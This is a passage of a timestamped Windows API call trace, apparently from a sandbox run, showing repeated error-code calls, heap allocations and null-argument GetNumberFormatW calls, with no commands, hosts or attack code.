(dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.178] SetLastError (dwErrCode=0x0) [0022.178] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x54) returned 0x700838 [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.179] SetLastError (dwErrCode=0x0) [0022.179] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.180] SetLastError (dwErrCode=0x0) [0022.180] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.181] SetLastError (dwErrCode=0x0) [0022.181] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.182] GetLastError () returned 0x0 [0022.182] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.183] GetLastError () returned 0x0 [0022.183] SetLastError (dwErrCode=0x0) [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x98) returned 0x703b50 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1f) returned 0x701668 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x703bf0 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x37) returned 0x703c30 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3c) returned 0x703c70 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x31) returned 0x703cb8 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x703cf8 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x703d18 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x14) returned 0x703d48 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xd) returned 0x700a70 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x25) returned 0x703d68 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x39) returned 0x703d98 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x703de0 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x703e00 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xe) returned 0x700a88 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x69) returned 0x703e20 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3e) returned 0x703e98 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1b) returned 0x701690 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1d) returned 0x7016b8 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x703ee0 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x12) returned 0x703f30 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x703f50 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1b) returned 0x7016e0 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x703f70 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x29) returned 0x703fa0 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x701708 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x41) returned 0x7028e0 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x702930 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xf) returned 0x700aa0 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x16) returned 0x702950 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x702970 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x29) returned 0x7029a8 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x15) returned 0x7029e0 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x701730 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x702a00 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x12) returned 0x702a38 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x702a58 [0022.184] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x46) returned 0x702a78 [0022.184] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7033b8 | out: hHeap=0x6f0000) returned 1 [0022.185] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x80) returned 0x702ac8 [0022.185] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0022.185] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x800) returned 0x702b50 [0022.185] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x405c62) returned 0x0 [0022.185] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x702ac8) returned 0x80 [0022.186] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x702ac8) returned 0x80 [0022.186] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x702ac8) returned 0x80 [0022.186] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x702ac8) returned 0x80 [0022.186] GetLastError () returned 0x0 [0022.186] SetLastError (dwErrCode=0x0) [0022.186] GetLastError () returned 0x0 [0022.186] SetLastError (dwErrCode=0x0) [0022.186] GetLastError () returned 0x0 [0022.186] SetLastError (dwErrCode=0x0) [0022.186] GetLastError () returned 0x0 [0022.186] SetLastError (dwErrCode=0x0) [0022.186] GetLastError () returned 0x0 [0022.186] SetLastError (dwErrCode=0x0) [0022.186] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.187] SetLastError (dwErrCode=0x0) [0022.187] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.188] GetLastError () returned 0x0 [0022.188] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.189] SetLastError (dwErrCode=0x0) [0022.189] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.190] SetLastError (dwErrCode=0x0) [0022.190] GetLastError () returned 0x0 [0022.191] SetLastError (dwErrCode=0x0) [0022.191] GetLastError () returned 0x0 [0022.191] SetLastError (dwErrCode=0x0) [0022.191] GetLastError () returned 0x0 [0022.191] SetLastError (dwErrCode=0x0) [0022.191] GetLastError () returned 0x0 [0022.191] SetLastError (dwErrCode=0x0) [0022.191] GetLastError () returned 0x0 [0022.191] SetLastError (dwErrCode=0x0) [0022.191] GetLastError () returned 0x0 [0022.191] SetLastError (dwErrCode=0x0) [0022.191] GetLastError () returned 0x0 [0022.191] SetLastError (dwErrCode=0x0) [0022.191] GetLastError () returned 0x0 [0022.191] SetLastError (dwErrCode=0x0) [0022.191] GetLastError () returned 0x0 [0022.191] SetLastError (dwErrCode=0x0) [0022.191] lstrlenW (lpString="") returned 0 [0022.191] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.192] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, 